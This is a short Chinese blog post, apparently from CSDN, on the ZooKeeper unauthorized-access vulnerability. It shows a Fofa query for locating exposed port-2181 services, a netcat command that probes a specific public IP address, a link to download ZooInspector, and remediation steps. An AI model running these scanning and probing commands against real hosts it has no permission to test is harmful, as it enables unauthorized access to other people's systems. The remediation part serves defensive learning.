Zookeeper未授权访问漏洞

Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

漏洞利用

步骤一:使用以下Fofa语法搜索资产信息....

复制代码
port="2181"

步骤二:在Kali中使用以下命令进行未授权访问漏洞测试..

复制代码
echo envi | nc 106.227.19.24 2181

步骤三:可使用Zookeeper可视化管理工具进行连接....

复制代码
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

漏洞修复

  1. 修改 ZooKeeper 默认端口,采用其他端口服务。
  2. 添加访问控制,配置服务来源地址限制策略。
  3. 增加 ZooKeeper 的认证配置。
相关推荐
群联云防护小杜2 小时前
云服务器主动防御策略与自动化防护(下)
运维·服务器·分布式·安全·自动化·音视频
TE-茶叶蛋4 小时前
秒杀压测计划 + Kafka 分区设计参考
分布式·kafka
repetitiononeoneday5 小时前
云原生课程-Docker
云原生
KubeSphere 云原生5 小时前
云原生周刊:Kubernetes v1.33 正式发布
云原生·容器·kubernetes
南 阳5 小时前
从微服务到AI服务:Nacos 3.0如何重构下一代动态治理体系?
人工智能·微服务·云原生·重构
青铜爱码士7 小时前
redis+lua+固定窗口实现分布式限流
redis·分布式·lua
阿里云云原生8 小时前
对比测评:为什么AI编程工具需要 Rules 能力?
云原生
啊喜拔牙9 小时前
如何搭建spark yarn模式的集群
大数据·分布式·spark
听雨·眠9 小时前
关于kafka
分布式·kafka·消息队列
TE-茶叶蛋9 小时前
NestJS + Kafka 秒杀系统完整实践总结
分布式·kafka